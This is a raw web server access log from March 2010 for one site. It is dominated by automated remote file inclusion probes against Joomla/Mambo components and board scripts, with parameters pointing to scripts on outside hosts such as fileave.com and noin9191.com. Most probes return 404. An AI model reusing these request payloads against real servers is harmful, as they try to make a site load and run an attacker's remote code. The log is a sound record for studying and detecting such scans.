87.250.255.243 - - [11/Mar/2010:05:01:35 -0800] "GET /logs/access_100223.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:02:16 -0800] "GET /logs/access_100121.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:05:43 -0800] "GET /logs//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:05:43 -0800] "GET /index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:05:43 -0800] "GET /logs/access.log//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:05:06:26 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosconfig_absolute_path=http://www.hit168.com.cn//new/sql?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:05:06:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosconfig_absolute_path=http://www.hit168.com.cn//new/sql?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:05:06:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosconfig_absolute_path=http://www.hit168.com.cn//new/sql?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:06:31 -0800] "GET /index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:06:31 -0800] "GET /logs//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:06:31 -0800] "GET /logs/access.log//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:08:41 -0800] "GET /index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:08:41 -0800] "GET /logs/access_100225.log//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:08:41 -0800] "GET /logs//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:05:12:04 -0800] "GET /logs/access.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.fileden.com/files/2010/1/12/2722069//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:12:16 -0800] "GET /logs/access.log//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:13:26 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:13:26 -0800] "GET /components/com_flyspray/startdown.php?file=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:13:26 -0800] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:14:07 -0800] "GET /index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:14:07 -0800] "GET /logs//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.6.152.83 - - [11/Mar/2010:05:14:07 -0800] "GET /logs/access.log%20%20//index.php?option=http://kucing1.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:14:34 -0800] "GET /logs/access_100121.log%20%20//components/com_flyspray/startdown.php?file=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:17:32 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:20:53 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:20:53 -0800] "GET /logs/access_100121.log///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:20:53 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:21:26 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:21:26 -0800] "GET /logs/access_100121.log///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:21:27 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:05:23:23 -0800] "GET /components/com_sef/sef_incl.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:05:23:23 -0800] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:05:23:23 -0800] "GET /logs/access_100121.log//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:25:47 -0800] "GET /logs/access_100121.log%20%20///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:25:47 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:25:47 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:25:50 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:25:50 -0800] "GET /logs/access_100121.log%20%20///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:25:50 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:05:27:28 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:05:27:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:05:27:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:27:38 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:27:38 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:27:38 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:28:37 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:28:37 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:28:37 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
208.80.193.30 - - [11/Mar/2010:05:35:57 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {F039225B-B4F2-3E1E-C461-90FAD31E33E1}; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:37:22 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wibs.co.kr/board/data/file/notice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:37:22 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wibs.co.kr/board/data/file/notice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:37:22 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wibs.co.kr/board/data/file/notice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:42:01 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wibs.co.kr/board/data/file/notice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:42:22 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:42:22 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:42:22 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:42:23 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:42:23 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:42:23 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:43:11 -0800] "GET /logs/access.log///requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:43:11 -0800] "GET /logs///requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:05:43:11 -0800] "GET //requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:45:01 -0800] "GET /logs/access_091228.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:45:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:45:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:45:02 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:45:04 -0800] "GET /logs/access_091228.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:47:07 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wibs.co.kr/board/data/file/notice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:47:11 -0800] "GET /logs/access_100224.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:47:26 -0800] "GET /logs/access_100224.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:05:50:56 -0800] "GET /logs/access.log///skin/happycast_category_brown/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:05:50:56 -0800] "GET /logs///skin/happycast_category_brown/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:05:50:56 -0800] "GET //skin/happycast_category_brown/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:52:03 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:52:08 -0800] "GET /logs/access_091228.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:52:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:52:26 -0800] "GET /logs/access_091228.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:53:28 -0800] "GET /logs/access_100224.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:53:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:53:42 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:53:42 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:54:02 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:54:02 -0800] "GET /logs/access_091228.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:54:03 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:55:39 -0800] "GET /logs/access_091228.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.250.255.243 - - [11/Mar/2010:05:56:00 -0800] "GET /logs/access_100308.log HTTP/1.1" 200 598678 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:05:56:37 -0800] "GET /logs/access_100224.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:05:58:12 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:05:58:15 -0800] "GET /logs/access_100224.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:01:16 -0800] "GET /logs/access_100225.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.150.203 - - [11/Mar/2010:06:03:34 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:05:13 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:05:13 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:05:13 -0800] "GET /logs/access_100224.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
212.241.177.123 - - [11/Mar/2010:06:07:59 -0800] "GET ///////?mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 200 784 "-" "Mozilla/5.0" "www.hellionindustries.com"
212.241.177.123 - - [11/Mar/2010:06:07:59 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.hellionindustries.com"
212.241.177.123 - - [11/Mar/2010:06:07:59 -0800] "GET /logs/access_091228.log%20%20////////?mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:09:37 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:09:37 -0800] "GET /logs/access_100121.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:09:37 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:10:59 -0800] "GET /logs/access_100121.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:10:59 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:10:59 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:11:41 -0800] "GET /logs/access_091228.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
212.241.177.123 - - [11/Mar/2010:06:13:39 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
66.249.67.130 - - [11/Mar/2010:06:19:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.hellionindustries.com"
